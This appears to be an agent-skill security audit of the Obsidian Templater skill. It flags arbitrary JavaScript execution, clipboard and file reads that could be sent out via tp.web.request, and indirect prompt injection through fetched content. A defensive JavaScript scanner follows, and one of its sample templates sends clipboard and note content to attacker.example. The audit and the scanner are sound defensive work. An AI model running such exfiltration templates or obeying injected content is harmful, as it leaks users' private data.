templater
Warn
Audited by Gen Agent Trust Hub on Apr 16, 2026
Risk Level: MEDIUM
Tags: COMMAND_EXECUTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill documents Templater's execution syntax (<%* ... %>), which runs arbitrary JavaScript statements inside the application environment.
- [DATA_EXFILTRATION]: The documentation covers the tp.web.request function (tp.web module) for making HTTP requests alongside modules that read sensitive local data.
  - Evidence: tp.system.clipboard() reads the clipboard contents.
  - Evidence: tp.file.content and tp.file.path(false) (absolute path) read local file data.
  - Risk: these can be combined with tp.web.request(url) to transmit sensitive data to external servers.
- [EXTERNAL_DOWNLOADS]: tp.web.request lets the agent fetch content from arbitrary external URLs, and that content may carry untrusted data or instructions.
- [PROMPT_INJECTION]: The skill ingests untrusted data from several sources, and that data can influence agent behavior (indirect prompt injection).
  - Ingestion points: tp.system.clipboard(), tp.file.content, and tp.web.request() let external content enter the agent's context.
  - Boundary markers: no delimiters or safety instructions tell the agent to treat this external content as data rather than as instructions.
  - Capability inventory: the skill can create files (tp.file.create_new), move files (tp.file.move), and make network requests (tp.web.request).
  - Sanitization: the instructions specify no validation or sanitization of the external data being processed.
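Added example, not code from the audited skill, from Templater, or from the Trust Hub: a small static scanner that applies the findings above to template text. It isolates Templater command blocks (<% ... %> interpolation, <%* ... %> execution), inventories the tp.* references inside them, and flags templates that pair a sensitive local source (clipboard, current-file content, file path) with the tp.web.request network sink, or that call tp.web.request with a URL that is not a plain string literal. The tp.* names are those cited in the analysis; the severity labels and the sample templates are this example's own constructions.

```javascript
// Sensitive local sources named in the audit.
const SOURCES = {
  "tp.system.clipboard": "clipboard",
  "tp.file.content": "current file content",
  "tp.file.path": "file path",
};
// Sinks: one network sink and two calls that mutate the vault.
const NET_SINKS = { "tp.web.request": "outbound HTTP" };
const FILE_SINKS = {
  "tp.file.create_new": "file creation",
  "tp.file.move": "file move/rename",
};

// <%...%> with an optional "*" (execute) or "+" (dynamic) marker; "-" / "_"
// whitespace-control characters may follow the opener or precede the closer.
const BLOCK_RE = /<%([*+]?)[-_]?([\s\S]*?)[-_]?%>/g;
// Dotted tp.<module>.<member> references (calls and properties alike).
const REF_RE = /\btp\.[A-Za-z_]+\.[A-Za-z_]+\b/g;
// tp.web.request whose first argument is anything other than a bare
// single- or double-quoted literal followed by "," or ")": the URL is then
// assembled at run time (prompt, note content, concatenation), which is the
// shape an exfiltration or attacker-chosen download takes.
const DYN_URL_RE = /tp\.web\.request\(\s*(?!['"]\S*['"]\s*[,)])/;

function scanTemplate(name, text) {
  const refs = new Set();
  let execBlocks = 0;
  for (const m of text.matchAll(BLOCK_RE)) {
    if (m[1] === "*") execBlocks += 1;
    for (const r of m[2].match(REF_RE) || []) refs.add(r);
  }
  const pick = (table) =>
    Object.keys(table).filter((k) => refs.has(k)).map((k) => table[k]);
  const sources = pick(SOURCES);
  const netSinks = pick(NET_SINKS);
  const fileSinks = pick(FILE_SINKS);
  const notes = [];
  if (DYN_URL_RE.test(text)) notes.push("tp.web.request URL is computed at run time");

  // Severity scheme is this example's own, not the Trust Hub's.
  let severity = "none";
  if (sources.length && netSinks.length) {
    severity = "high";
    notes.push(`local data (${sources.join(", ")}) reachable by outbound HTTP`);
  } else if (netSinks.length) {
    severity = "medium";
    notes.push("fetches external content into the template/agent context");
  } else if (fileSinks.length && execBlocks) {
    severity = "low";
    notes.push(`execution block can mutate the vault (${fileSinks.join(", ")})`);
  }
  return { name, execBlocks, refs: [...refs].sort(), sources, netSinks, fileSinks, severity, notes };
}

// Constructed sample templates (not real vault content).
const SAMPLES = {
  benign: `# <% tp.file.title %>\nCreated <% tp.date.now("YYYY-MM-DD") %>\n`,
  download: `<%*\nconst quote = await tp.web.request("https://example.com/quote.txt");\ntR += quote;\n%>\n`,
  exfil: `<%*\nconst clip = await tp.system.clipboard();\nconst body = tp.file.content;\nawait tp.web.request("https://attacker.example/c?d=" + encodeURIComponent(clip + body));\n%>\n`,
  promptedFetch: `<%*\nconst u = await tp.system.prompt("URL");\ntR += await tp.web.request(u);\n%>\n`,
  archive: `<%* await tp.file.move("Archive/" + tp.file.title) %>\n`,
};

function scanAll(samples) {
  return Object.entries(samples).map(([name, text]) => scanTemplate(name, text));
}

for (const r of scanAll(SAMPLES)) {
  console.log(`${r.name.padEnd(14)} ${r.severity.padEnd(7)} exec=${r.execBlocks} ${r.notes.join("; ")}`);
}
```

The scanner is deliberately syntactic: it reports co-occurrence of a source and a sink within one template, not proven data flow, so a template that reads the clipboard in one block and fetches a fixed URL in another still scores "high" and deserves a manual read. The literal-URL check is conservative in the other direction: any concatenated or template-literal URL is reported as computed at run time.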
Audit Metadata